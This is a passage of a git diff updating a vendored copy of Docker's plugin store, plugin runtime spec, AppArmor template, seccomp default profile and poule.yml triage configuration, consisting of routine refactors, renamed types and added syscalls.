ps.RLock() defer ps.RUnlock() @@ -48,7 +38,7 @@ func (ps *Store) GetV2Plugin(refOrID string) (*v2.Plugin, error) { p, idOk := ps.plugins[id] if !idOk { - return nil, errors.WithStack(ErrNotFound(id)) + return nil, errors.WithStack(errNotFound(id)) } return p, nil @@ -58,13 +48,13 @@ func (ps *Store) GetV2Plugin(refOrID string) (*v2.Plugin, error) { func (ps *Store) validateName(name string) error { for _, p := range ps.plugins { if p.Name() == name { - return errors.Errorf("plugin %q already exists", name) + return alreadyExistsError(name) } } return nil } -// GetAll retreives all plugins. +// GetAll retrieves all plugins. func (ps *Store) GetAll() map[string]*v2.Plugin { ps.RLock() defer ps.RUnlock() @@ -75,6 +65,10 @@ func (ps *Store) GetAll() map[string]*v2.Plugin { func (ps *Store) SetAll(plugins map[string]*v2.Plugin) { ps.Lock() defer ps.Unlock() + + for _, p := range plugins { + ps.setSpecOpts(p) + } ps.plugins = plugins } @@ -101,6 +95,22 @@ func (ps *Store) SetState(p *v2.Plugin, state bool) { p.PluginObj.Enabled = state } +func (ps *Store) setSpecOpts(p *v2.Plugin) { + var specOpts []SpecOpt + for _, typ := range p.GetTypes() { + opts, ok := ps.specOpts[typ.String()] + if ok { + specOpts = append(specOpts, opts...) + } + } + + p.SetSpecOptModifier(func(s *specs.Spec) { + for _, o := range specOpts { + o(s) + } + }) +} + // Add adds a plugin to memory and plugindb. // An error will be returned if there is a collision. func (ps *Store) Add(p *v2.Plugin) error { @@ -110,6 +120,9 @@ func (ps *Store) Add(p *v2.Plugin) error { if v, exist := ps.plugins[p.GetID()]; exist { return fmt.Errorf("plugin %q has the same ID %s as %q", p.Name(), p.GetID(), v.Name()) } + + ps.setSpecOpts(p) + ps.plugins[p.GetID()] = p return nil } @@ -123,38 +136,40 @@ func (ps *Store) Remove(p *v2.Plugin) { // Get returns an enabled plugin matching the given name and capability. func (ps *Store) Get(name, capability string, mode int) (plugingetter.CompatPlugin, error) { - var ( - p *v2.Plugin - err error - ) - // Lookup using new model. if ps != nil { - p, err = ps.GetV2Plugin(name) + p, err := ps.GetV2Plugin(name) if err == nil { - p.AddRefCount(mode) if p.IsEnabled() { - return p.FilterByCap(capability) + fp, err := p.FilterByCap(capability) + if err != nil { + return nil, err + } + p.AddRefCount(mode) + return fp, nil } + // Plugin was found but it is disabled, so we should not fall back to legacy plugins // but we should error out right away - return nil, ErrNotFound(name) + return nil, errDisabled(name) } - if _, ok := errors.Cause(err).(ErrNotFound); !ok { + if _, ok := errors.Cause(err).(errNotFound); !ok { return nil, err } } - // Lookup using legacy model. - if allowV1PluginsFallback { - p, err := plugins.Get(name, capability) - if err != nil { - return nil, fmt.Errorf("legacy plugin: %v", err) - } - return p, nil + if !allowV1PluginsFallback { + return nil, errNotFound(name) } - return nil, err + p, err := plugins.Get(name, capability) + if err == nil { + return p, nil + } + if errors.Cause(err) == plugins.ErrNotFound { + return nil, errNotFound(name) + } + return nil, errors.Wrap(errdefs.System(err), "legacy plugin") } // GetAllManagedPluginsByCap returns a list of managed plugins matching the given capability. @@ -182,7 +197,7 @@ func (ps *Store) GetAllByCap(capability string) ([]plugingetter.CompatPlugin, er if allowV1PluginsFallback { pl, err := plugins.GetAll(capability) if err != nil { - return nil, fmt.Errorf("legacy plugin: %v", err) + return nil, errors.Wrap(errdefs.System(err), "legacy plugin") } for _, p := range pl { result = append(result, p) @@ -191,20 +206,24 @@ func (ps *Store) GetAllByCap(capability string) ([]plugingetter.CompatPlugin, er return result, nil } +func pluginType(cap string) string { + return fmt.Sprintf("docker.%s/%s", strings.ToLower(cap), defaultAPIVersion) +} + // Handle sets a callback for a given capability. It is only used by network // and ipam drivers during plugin registration. The callback registers the // driver with the subsystem (network, ipam). func (ps *Store) Handle(capability string, callback func(string, *plugins.Client)) { - pluginType := fmt.Sprintf("docker.%s/%s", strings.ToLower(capability), defaultAPIVersion) + typ := pluginType(capability) // Register callback with new plugin model. ps.Lock() - handlers, ok := ps.handlers[pluginType] + handlers, ok := ps.handlers[typ] if !ok { handlers = []func(string, *plugins.Client){} } handlers = append(handlers, callback) - ps.handlers[pluginType] = handlers + ps.handlers[typ] = handlers ps.Unlock() // Register callback with legacy plugin model. @@ -213,6 +232,15 @@ func (ps *Store) Handle(capability string, callback func(string, *plugins.Client } } +// RegisterRuntimeOpt stores a list of SpecOpts for the provided capability. +// These options are applied to the runtime spec before a plugin is started for the specified capability. +func (ps *Store) RegisterRuntimeOpt(cap string, opts ...SpecOpt) { + ps.Lock() + defer ps.Unlock() + typ := pluginType(cap) + ps.specOpts[typ] = append(ps.specOpts[typ], opts...) +} + // CallHandler calls the registered callback. It is invoked during plugin enable. func (ps *Store) CallHandler(p *v2.Plugin) { for _, typ := range p.GetTypes() { @@ -230,19 +258,19 @@ func (ps *Store) resolvePluginID(idOrName string) (string, error) { return idOrName, nil } - ref, err := reference.ParseNamed(idOrName) + ref, err := reference.ParseNormalizedNamed(idOrName) if err != nil { - return "", errors.WithStack(ErrNotFound(idOrName)) + return "", errors.WithStack(errNotFound(idOrName)) } if _, ok := ref.(reference.Canonical); ok { - logrus.Warnf("canonical references cannot be resolved: %v", ref.String()) - return "", errors.WithStack(ErrNotFound(idOrName)) + logrus.Warnf("canonical references cannot be resolved: %v", reference.FamiliarString(ref)) + return "", errors.WithStack(errNotFound(idOrName)) } - fullRef := reference.WithDefaultTag(ref) + ref = reference.TagNameOnly(ref) for _, p := range ps.plugins { - if p.PluginObj.Name == fullRef.String() { + if p.PluginObj.Name == reference.FamiliarString(ref) { return p.PluginObj.ID, nil } } @@ -251,13 +279,13 @@ func (ps *Store) resolvePluginID(idOrName string) (string, error) { for id, p := range ps.plugins { // this can be optimized if strings.HasPrefix(id, idOrName) { if found != nil { - return "", errors.WithStack(ErrAmbiguous(idOrName)) + return "", errors.WithStack(errAmbiguous(idOrName)) } found = p } } if found == nil { - return "", errors.WithStack(ErrNotFound(idOrName)) + return "", errors.WithStack(errNotFound(idOrName)) } return found.PluginObj.ID, nil } diff --git a/vendor/github.com/docker/docker/plugin/store_test.go b/vendor/github.com/docker/docker/plugin/store_test.go index 6b1f6a9418..14b484f76c 100644 --- a/vendor/github.com/docker/docker/plugin/store_test.go +++ b/vendor/github.com/docker/docker/plugin/store_test.go @@ -1,16 +1,17 @@ -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( "testing" "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/plugingetter" "github.com/docker/docker/plugin/v2" ) func TestFilterByCapNeg(t *testing.T) { p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}} - iType := types.PluginInterfaceType{"volumedriver", "docker", "1.0"} - i := types.PluginConfigInterface{"plugins.sock", []types.PluginInterfaceType{iType}} + iType := types.PluginInterfaceType{Capability: "volumedriver", Prefix: "docker", Version: "1.0"} + i := types.PluginConfigInterface{Socket: "plugins.sock", Types: []types.PluginInterfaceType{iType}} p.PluginObj.Config.Interface = i _, err := p.FilterByCap("foobar") @@ -22,8 +23,8 @@ func TestFilterByCapNeg(t *testing.T) { func TestFilterByCapPos(t *testing.T) { p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}} - iType := types.PluginInterfaceType{"volumedriver", "docker", "1.0"} - i := types.PluginConfigInterface{"plugins.sock", []types.PluginInterfaceType{iType}} + iType := types.PluginInterfaceType{Capability: "volumedriver", Prefix: "docker", Version: "1.0"} + i := types.PluginConfigInterface{Socket: "plugins.sock", Types: []types.PluginInterfaceType{iType}} p.PluginObj.Config.Interface = i _, err := p.FilterByCap("volumedriver") @@ -31,3 +32,33 @@ func TestFilterByCapPos(t *testing.T) { t.Fatalf("expected no error, got %v", err) } } + +func TestStoreGetPluginNotMatchCapRefs(t *testing.T) { + s := NewStore() + p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}} + + iType := types.PluginInterfaceType{Capability: "whatever", Prefix: "docker", Version: "1.0"} + i := types.PluginConfigInterface{Socket: "plugins.sock", Types: []types.PluginInterfaceType{iType}} + p.PluginObj.Config.Interface = i + + if err := s.Add(&p); err != nil { + t.Fatal(err) + } + + if _, err := s.Get("test", "volumedriver", plugingetter.Acquire); err == nil { + t.Fatal("exepcted error when getting plugin that doesn't match the passed in capability") + } + + if refs := p.GetRefCount(); refs != 0 { + t.Fatalf("reference count should be 0, got: %d", refs) + } + + p.PluginObj.Enabled = true + if _, err := s.Get("test", "volumedriver", plugingetter.Acquire); err == nil { + t.Fatal("exepcted error when getting plugin that doesn't match the passed in capability") + } + + if refs := p.GetRefCount(); refs != 0 { + t.Fatalf("reference count should be 0, got: %d", refs) + } +} diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin.go b/vendor/github.com/docker/docker/plugin/v2/plugin.go index 93b489a14b..6852511c5e 100644 --- a/vendor/github.com/docker/docker/plugin/v2/plugin.go +++ b/vendor/github.com/docker/docker/plugin/v2/plugin.go @@ -1,27 +1,36 @@ -package v2 +package v2 // import "github.com/docker/docker/plugin/v2" import ( "fmt" + "net" + "path/filepath" "strings" "sync" + "time" - "github.com/docker/distribution/digest" "github.com/docker/docker/api/types" "github.com/docker/docker/pkg/plugingetter" "github.com/docker/docker/pkg/plugins" + "github.com/opencontainers/go-digest" + "github.com/opencontainers/runtime-spec/specs-go" ) // Plugin represents an individual plugin. type Plugin struct { - mu sync.RWMutex - PluginObj types.Plugin `json:"plugin"` // todo: embed struct - pClient *plugins.Client - refCount int - PropagatedMount string // TODO: make private - Rootfs string // TODO: make private + mu sync.RWMutex + PluginObj types.Plugin `json:"plugin"` // todo: embed struct + pClient *plugins.Client + refCount int + Rootfs string // TODO: make private Config digest.Digest Blobsums []digest.Digest + + modifyRuntimeSpec func(*specs.Spec) + + SwarmServiceID string + timeout time.Duration + addr net.Addr } const defaultPluginRuntimeDestination = "/run/docker/plugins" @@ -35,13 +44,17 @@ func (e ErrInadequateCapability) Error() string { return fmt.Sprintf("plugin does not provide %q capability", e.cap) } -// BasePath returns the path to which all paths returned by the plugin are relative to. -// For Plugin objects this returns the host path of the plugin container's rootfs. -func (p *Plugin) BasePath() string { - return p.Rootfs +// ScopedPath returns the path scoped to the plugin rootfs +func (p *Plugin) ScopedPath(s string) string { + if p.PluginObj.Config.PropagatedMount != "" && strings.HasPrefix(s, p.PluginObj.Config.PropagatedMount) { + // re-scope to the propagated mount path on the host + return filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount", strings.TrimPrefix(s, p.PluginObj.Config.PropagatedMount)) + } + return filepath.Join(p.Rootfs, s) } // Client returns the plugin client. +// Deprecated: use p.Addr() and manually create the client func (p *Plugin) Client() *plugins.Client { p.mu.RLock() defer p.mu.RUnlock() @@ -50,6 +63,7 @@ func (p *Plugin) Client() *plugins.Client { } // SetPClient set the plugin client. +// Deprecated: Hardcoded plugin client is deprecated func (p *Plugin) SetPClient(client *plugins.Client) { p.mu.Lock() defer p.mu.Unlock() @@ -140,6 +154,9 @@ next: } // it is, so lets update the settings in memory + if mount.Source == nil { + return fmt.Errorf("Plugin config has no mount source") + } *mount.Source = s.value continue next } @@ -157,6 +174,9 @@ next: } // it is, so lets update the settings in memory + if device.Path == nil { + return fmt.Errorf("Plugin config has no device path") + } *device.Path = s.value continue next } @@ -233,12 +253,59 @@ func (p *Plugin) AddRefCount(count int) { // Acquire increments the plugin's reference count // This should be followed up by `Release()` when the plugin is no longer in use. func (p *Plugin) Acquire() { - p.AddRefCount(plugingetter.ACQUIRE) + p.AddRefCount(plugingetter.Acquire) } // Release decrements the plugin's reference count // This should only be called when the plugin is no longer in use, e.g. with -// via `Acquire()` or getter.Get("name", "type", plugingetter.ACQUIRE) +// via `Acquire()` or getter.Get("name", "type", plugingetter.Acquire) func (p *Plugin) Release() { - p.AddRefCount(plugingetter.RELEASE) + p.AddRefCount(plugingetter.Release) +} + +// SetSpecOptModifier sets the function to use to modify the generated +// runtime spec. +func (p *Plugin) SetSpecOptModifier(f func(*specs.Spec)) { + p.mu.Lock() + p.modifyRuntimeSpec = f + p.mu.Unlock() +} + +// Timeout gets the currently configured connection timeout. +// This should be used when dialing the plugin. +func (p *Plugin) Timeout() time.Duration { + p.mu.RLock() + t := p.timeout + p.mu.RUnlock() + return t +} + +// SetTimeout sets the timeout to use for dialing. +func (p *Plugin) SetTimeout(t time.Duration) { + p.mu.Lock() + p.timeout = t + p.mu.Unlock() +} + +// Addr returns the net.Addr to use to connect to the plugin socket +func (p *Plugin) Addr() net.Addr { + p.mu.RLock() + addr := p.addr + p.mu.RUnlock() + return addr +} + +// SetAddr sets the plugin address which can be used for dialing the plugin. +func (p *Plugin) SetAddr(addr net.Addr) { + p.mu.Lock() + p.addr = addr + p.mu.Unlock() +} + +// Protocol is the protocol that should be used for interacting with the plugin. +func (p *Plugin) Protocol() string { + if p.PluginObj.Config.Interface.ProtocolScheme != "" { + return p.PluginObj.Config.Interface.ProtocolScheme + } + return plugins.ProtocolSchemeHTTPV1 } diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go b/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go index e980e7f29a..58c432fcd6 100644 --- a/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go +++ b/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go @@ -1,23 +1,23 @@ -// +build linux - -package v2 +package v2 // import "github.com/docker/docker/plugin/v2" import ( "os" "path/filepath" + "runtime" "strings" "github.com/docker/docker/api/types" "github.com/docker/docker/oci" "github.com/docker/docker/pkg/system" - specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/runtime-spec/specs-go" "github.com/pkg/errors" ) // InitSpec creates an OCI spec from the plugin's config. func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { s := oci.DefaultSpec() - s.Root = specs.Root{ + + s.Root = &specs.Root{ Path: p.Rootfs, Readonly: false, // TODO: all plugins should be readonly? settable in config? } @@ -32,6 +32,17 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { return nil, errors.WithStack(err) } + if p.PluginObj.Config.PropagatedMount != "" { + pRoot := filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount") + s.Mounts = append(s.Mounts, specs.Mount{ + Source: pRoot, + Destination: p.PluginObj.Config.PropagatedMount, + Type: "bind", + Options: []string{"rbind", "rw", "rshared"}, + }) + s.Linux.RootfsPropagation = "rshared" + } + mounts := append(p.PluginObj.Config.Mounts, types.PluginMount{ Source: &execRoot, Destination: defaultPluginRuntimeDestination, @@ -42,7 +53,7 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { if p.PluginObj.Config.Network.Type != "" { // TODO: if net == bridge, use libnetwork controller to create a new plugin-specific bridge, bind mount /etc/hosts and /etc/resolv.conf look at the docker code (allocateNetwork, initialize) if p.PluginObj.Config.Network.Type == "host" { - oci.RemoveNamespace(&s, specs.NamespaceType("network")) + oci.RemoveNamespace(&s, specs.LinuxNamespaceType("network")) } etcHosts := "/etc/hosts" resolvConf := "/etc/resolv.conf" @@ -60,6 +71,13 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { Options: []string{"rbind", "ro"}, }) } + if p.PluginObj.Config.PidHost { + oci.RemoveNamespace(&s, specs.LinuxNamespaceType("pid")) + } + + if p.PluginObj.Config.IpcHost { + oci.RemoveNamespace(&s, specs.LinuxNamespaceType("ipc")) + } for _, mnt := range mounts { m := specs.Mount{ @@ -82,14 +100,8 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { } } - if p.PluginObj.Config.PropagatedMount != "" { - p.PropagatedMount = filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount) - s.Linux.RootfsPropagation = "rshared" - } - if p.PluginObj.Config.Linux.AllowAllDevices { - rwm := "rwm" - s.Linux.Resources.Devices = []specs.DeviceCgroup{{Allow: true, Access: &rwm}} + s.Linux.Resources.Devices = []specs.LinuxDeviceCgroup{{Allow: true, Access: "rwm"}} } for _, dev := range p.PluginObj.Settings.Devices { path := *dev.Path @@ -102,7 +114,7 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { } envs := make([]string, 1, len(p.PluginObj.Settings.Env)+1) - envs[0] = "PATH=" + system.DefaultPathEnv + envs[0] = "PATH=" + system.DefaultPathEnv(runtime.GOOS) envs = append(envs, p.PluginObj.Settings.Env...) args := append(p.PluginObj.Config.Entrypoint, p.PluginObj.Settings.Args...) @@ -115,7 +127,15 @@ func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { s.Process.Cwd = cwd s.Process.Env = envs - s.Process.Capabilities = append(s.Process.Capabilities, p.PluginObj.Config.Linux.Capabilities...) + caps := s.Process.Capabilities + caps.Bounding = append(caps.Bounding, p.PluginObj.Config.Linux.Capabilities...) + caps.Permitted = append(caps.Permitted, p.PluginObj.Config.Linux.Capabilities...) + caps.Inheritable = append(caps.Inheritable, p.PluginObj.Config.Linux.Capabilities...) + caps.Effective = append(caps.Effective, p.PluginObj.Config.Linux.Capabilities...) + + if p.modifyRuntimeSpec != nil { + p.modifyRuntimeSpec(&s) + } return &s, nil } diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go b/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go index e60fb8311e..5242fe124c 100644 --- a/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go +++ b/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go @@ -1,11 +1,11 @@ // +build !linux -package v2 +package v2 // import "github.com/docker/docker/plugin/v2" import ( "errors" - specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/runtime-spec/specs-go" ) // InitSpec creates an OCI spec from the plugin's config. diff --git a/vendor/github.com/docker/docker/plugin/v2/settable.go b/vendor/github.com/docker/docker/plugin/v2/settable.go index 79c6befc24..efda564705 100644 --- a/vendor/github.com/docker/docker/plugin/v2/settable.go +++ b/vendor/github.com/docker/docker/plugin/v2/settable.go @@ -1,4 +1,4 @@ -package v2 +package v2 // import "github.com/docker/docker/plugin/v2" import ( "errors" diff --git a/vendor/github.com/docker/docker/plugin/v2/settable_test.go b/vendor/github.com/docker/docker/plugin/v2/settable_test.go index 7183f3a679..f2bb0a482f 100644 --- a/vendor/github.com/docker/docker/plugin/v2/settable_test.go +++ b/vendor/github.com/docker/docker/plugin/v2/settable_test.go @@ -1,4 +1,4 @@ -package v2 +package v2 // import "github.com/docker/docker/plugin/v2" import ( "reflect" @@ -68,7 +68,7 @@ func TestIsSettable(t *testing.T) { } } -func TestUpdateSettinsEnv(t *testing.T) { +func TestUpdateSettingsEnv(t *testing.T) { contexts := []struct { env []string set settable diff --git a/vendor/github.com/docker/docker/poule.yml b/vendor/github.com/docker/docker/poule.yml index 61aab4551b..fe1cb3d103 100644 --- a/vendor/github.com/docker/docker/poule.yml +++ b/vendor/github.com/docker/docker/poule.yml @@ -3,6 +3,9 @@ pull_request: [ opened ] operations: - type: label + filters: { + ~labels: [ "status/0-triage", "status/1-design-review", "status/2-code-review", "status/3-docs-review", "status/4-merge" ], + } settings: { patterns: { status/0-triage: [ ".*" ], @@ -23,20 +26,15 @@ area/networking: [ "docker network", "ipvs", "vxlan" ], area/runtime: [ "oci runtime error" ], area/security/trust: [ "docker_content_trust" ], - area/swarm: [ "docker node", "docker service", "docker swarm" ], + area/swarm: [ "docker node", "docker swarm", "docker service create", "docker service inspect", "docker service logs", "docker service ls", "docker service ps", "docker service rm", "docker service scale", "docker service update" ], platform/desktop: [ "docker for mac", "docker for windows" ], platform/freebsd: [ "freebsd" ], platform/windows: [ "nanoserver", "windowsservercore", "windows server" ], + platform/arm: [ "raspberry", "raspbian", "rpi", "beaglebone", "pine64" ], } } - type: version-label -# When a pull request is closed, attach it to the currently active milestone. -- triggers: - pull_request: [ closed ] - operations: - - type: version-milestone - # Labeling a PR with `rebuild/` triggers a rebuild job for the associated # configuration. The label is automatically removed after the rebuild is initiated. There's no such # thing as "templating" in this configuration, so we need one operation for each type of @@ -66,6 +64,11 @@ configurations: [ janky ], label: "rebuild/janky", } + - type: rebuild + settings: { + configurations: [ powerpc ], + label: "rebuild/powerpc", + } - type: rebuild settings: { configurations: [ userns ], @@ -86,3 +89,41 @@ configurations: [ windowsRS1 ], label: "rebuild/windowsRS1", } + - type: rebuild + settings: { + configurations: [ z ], + label: "rebuild/z", + } + +# Once a day, randomly assign pull requests older than 2 weeks. +- schedule: "@daily" + operations: + - type: random-assign + filters: { + age: "2w", + is: "pr", + } + settings: { + users: [ + "aaronlehmann", + "akihirosuda", + "coolljt0725", + "cpuguy83", + "crosbymichael", + "dnephin", + "duglin", + "fntlnz", + "johnstep", + "justincormack", + "mhbauer", + "mlaventure", + "runcom", + "stevvooe", + "thajeztah", + "tiborvass", + "tonistiigi", + "vdemeester", + "vieux", + "yongtang", + ] + } diff --git a/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go b/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go index 5132ebe008..b021668c8e 100644 --- a/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go +++ b/vendor/github.com/docker/docker/profiles/apparmor/apparmor.go @@ -1,6 +1,6 @@ // +build linux -package apparmor +package apparmor // import "github.com/docker/docker/profiles/apparmor" import ( "bufio" @@ -9,9 +9,9 @@ import ( "os" "path" "strings" + "text/template" "github.com/docker/docker/pkg/aaparser" - "github.com/docker/docker/utils/templates" ) var ( @@ -33,7 +33,7 @@ type profileData struct { // generateDefault creates an apparmor profile from ProfileData. func (p *profileData) generateDefault(out io.Writer) error { - compiled, err := templates.NewParse("apparmor_profile", baseTemplate) + compiled, err := template.New("apparmor_profile").Parse(baseTemplate) if err != nil { return err } @@ -54,10 +54,7 @@ func (p *profileData) generateDefault(out io.Writer) error { } p.Version = ver - if err := compiled.Execute(out, p); err != nil { - return err - } - return nil + return compiled.Execute(out, p) } // macrosExists checks if the passed macro exists. @@ -84,15 +81,10 @@ func InstallDefault(name string) error { defer os.Remove(profilePath) if err := p.generateDefault(f); err != nil { - f.Close() - return err - } - - if err := aaparser.LoadProfile(profilePath); err != nil { return err } - return nil + return aaparser.LoadProfile(profilePath) } // IsLoaded checks if a profile with the given name has been loaded into the diff --git a/vendor/github.com/docker/docker/profiles/apparmor/template.go b/vendor/github.com/docker/docker/profiles/apparmor/template.go index c5ea4584de..c00a3f70e9 100644 --- a/vendor/github.com/docker/docker/profiles/apparmor/template.go +++ b/vendor/github.com/docker/docker/profiles/apparmor/template.go @@ -1,6 +1,6 @@ // +build linux -package apparmor +package apparmor // import "github.com/docker/docker/profiles/apparmor" // baseTemplate defines the default apparmor profile for containers. const baseTemplate = ` @@ -24,8 +24,6 @@ profile {{.Name}} flags=(attach_disconnected,mediate_deleted) { deny @{PROC}/sys/[^k]** w, # deny /proc/sys except /proc/sys/k* (effectively /proc/sys/kernel) deny @{PROC}/sys/kernel/{?,??,[^s][^h][^m]**} w, # deny everything except shm* in /proc/sys/kernel/ deny @{PROC}/sysrq-trigger rwklx, - deny @{PROC}/mem rwklx, - deny @{PROC}/kmem rwklx, deny @{PROC}/kcore rwklx, deny mount, diff --git a/vendor/github.com/docker/docker/profiles/seccomp/default.json b/vendor/github.com/docker/docker/profiles/seccomp/default.json index ac129d3a31..5717c00cde 100755 --- a/vendor/github.com/docker/docker/profiles/seccomp/default.json +++ b/vendor/github.com/docker/docker/profiles/seccomp/default.json @@ -55,7 +55,7 @@ "accept", "accept4", "access", - "alarm", + "adjtimex", "alarm", "bind", "brk", @@ -223,10 +223,12 @@ "prctl", "pread64", "preadv", + "preadv2", "prlimit64", "pselect6", "pwrite64", "pwritev", + "pwritev2", "read", "readahead", "readlink", @@ -320,6 +322,7 @@ "stat64", "statfs", "statfs64", + "statx", "symlink", "symlinkat", "sync", @@ -398,6 +401,40 @@ "includes": {}, "excludes": {} }, + { + "names": [ + "personality" + ], + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 131072, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ], + "comment": "", + "includes": {}, + "excludes": {} + }, + { + "names": [ + "personality" + ], + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 131080, + "valueTwo": 0, + "op": "SCMP_CMP_EQ" + } + ], + "comment": "", + "includes": {}, + "excludes": {} + }, { "names": [ "personality" @@ -415,10 +452,25 @@ "includes": {}, "excludes": {} }, + { + "names": [ + "sync_file_range2" + ], + "action": "SCMP_ACT_ALLOW", + "args": [], + "comment": "", + "includes": { + "arches": [ + "ppc64le" + ] + }, + "excludes": {} + }, { "names": [ "arm_fadvise64_64", "arm_sync_file_range", + "sync_file_range2", "breakpoint", "cacheflush", "set_tls" @@ -505,6 +557,7 @@ "mount", "name_to_handle_at", "perf_event_open", + "quotactl", "setdomainname", "sethostname", "setns", @@ -668,7 +721,7 @@ "names": [ "settimeofday", "stime", - "adjtimex" + "clock_settime" ], "action": "SCMP_ACT_ALLOW", "args": [], diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go index a54ef50a8b..4438670a58 100644 --- a/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp.go @@ -1,6 +1,6 @@ // +build linux -package seccomp +package seccomp // import "github.com/docker/docker/profiles/seccomp" import ( "encoding/json" @@ -8,7 +8,6 @@ import ( "fmt" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringutils" "github.com/opencontainers/runtime-spec/specs-go" libseccomp "github.com/seccomp/libseccomp-golang" ) @@ -16,12 +15,12 @@ import ( //go:generate go run -tags 'seccomp' generate.go // GetDefaultProfile returns the default seccomp profile. -func GetDefaultProfile(rs *specs.Spec) (*specs.Seccomp, error) { +func GetDefaultProfile(rs *specs.Spec) (*specs.LinuxSeccomp, error) { return setupSeccomp(DefaultProfile(), rs) } -// LoadProfile takes a file path and decodes the seccomp profile. -func LoadProfile(body string, rs *specs.Spec) (*specs.Seccomp, error) { +// LoadProfile takes a json string and decodes the seccomp profile. +func LoadProfile(body string, rs *specs.Spec) (*specs.LinuxSeccomp, error) { var config types.Seccomp if err := json.Unmarshal([]byte(body), &config); err != nil { return nil, fmt.Errorf("Decoding seccomp profile failed: %v", err) @@ -39,7 +38,18 @@ var nativeToSeccomp = map[string]types.Arch{ "s390x": types.ArchS390X, } -func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.Seccomp, error) { +// inSlice tests whether a string is contained in a slice of strings or not. +// Comparison is case sensitive +func inSlice(slice []string, s string) bool { + for _, ss := range slice { + if s == ss { + return true + } + } + return false +} + +func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.LinuxSeccomp, error) { if config == nil { return nil, nil } @@ -49,7 +59,7 @@ func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.Seccomp, error) return nil, nil } - newConfig := &specs.Seccomp{} + newConfig := &specs.LinuxSeccomp{} var arch string var native, err = libseccomp.GetNativeArch() @@ -83,31 +93,31 @@ func setupSeccomp(config *types.Seccomp, rs *specs.Spec) (*specs.Seccomp, error) } } - newConfig.DefaultAction = specs.Action(config.DefaultAction) + newConfig.DefaultAction = specs.LinuxSeccompAction(config.DefaultAction) Loop: // Loop through all syscall blocks and convert them to libcontainer format after filtering them for _, call := range config.Syscalls { if len(call.Excludes.Arches) > 0 { - if stringutils.InSlice(call.Excludes.Arches, arch) { + if inSlice(call.Excludes.Arches, arch) { continue Loop } } if len(call.Excludes.Caps) > 0 { for _, c := range call.Excludes.Caps { - if stringutils.InSlice(rs.Process.Capabilities, c) { + if inSlice(rs.Process.Capabilities.Bounding, c) { continue Loop } } } if len(call.Includes.Arches) > 0 { - if !stringutils.InSlice(call.Includes.Arches, arch) { + if !inSlice(call.Includes.Arches, arch) { continue Loop } } if len(call.Includes.Caps) > 0 { for _, c := range call.Includes.Caps { - if !stringutils.InSlice(rs.Process.Capabilities, c) { + if !inSlice(rs.Process.Capabilities.Bounding, c) { continue Loop } } @@ -129,19 +139,19 @@ Loop: return newConfig, nil } -func createSpecsSyscall(name string, action types.Action, args []*types.Arg) specs.Syscall { - newCall := specs.Syscall{ - Name: name, - Action: specs.Action(action), +func createSpecsSyscall(name string, action types.Action, args []*types.Arg) specs.LinuxSyscall { + newCall := specs.LinuxSyscall{ + Names: []string{name}, + Action: specs.LinuxSeccompAction(action), } // Loop through all the arguments of the syscall and convert them for _, arg := range args { - newArg := specs.Arg{ + newArg := specs.LinuxSeccompArg{ Index: arg.Index, Value: arg.Value, ValueTwo: arg.ValueTwo, - Op: specs.Operator(arg.Op), + Op: specs.LinuxSeccompOperator(arg.Op), } newCall.Args = append(newCall.Args, newArg) diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go index b84de820b7..be29aa4f70 100644 --- a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go @@ -1,11 +1,10 @@ // +build linux,seccomp -package seccomp +package seccomp // import "github.com/docker/docker/profiles/seccomp" import ( - "syscall" - "github.com/docker/docker/api/types" + "golang.org/x/sys/unix" ) func arches() []types.Architecture { @@ -49,7 +48,7 @@ func DefaultProfile() *types.Seccomp { "accept", "accept4", "access", - "alarm", + "adjtimex", "alarm", "bind", "brk", @@ -217,10 +216,12 @@ func DefaultProfile() *types.Seccomp { "prctl", "pread64", "preadv", + "preadv2", "prlimit64", "pselect6", "pwrite64", "pwritev", + "pwritev2", "read", "readahead", "readlink", @@ -314,6 +315,7 @@ func DefaultProfile() *types.Seccomp { "stat64", "statfs", "statfs64", + "statx", "symlink", "symlinkat", 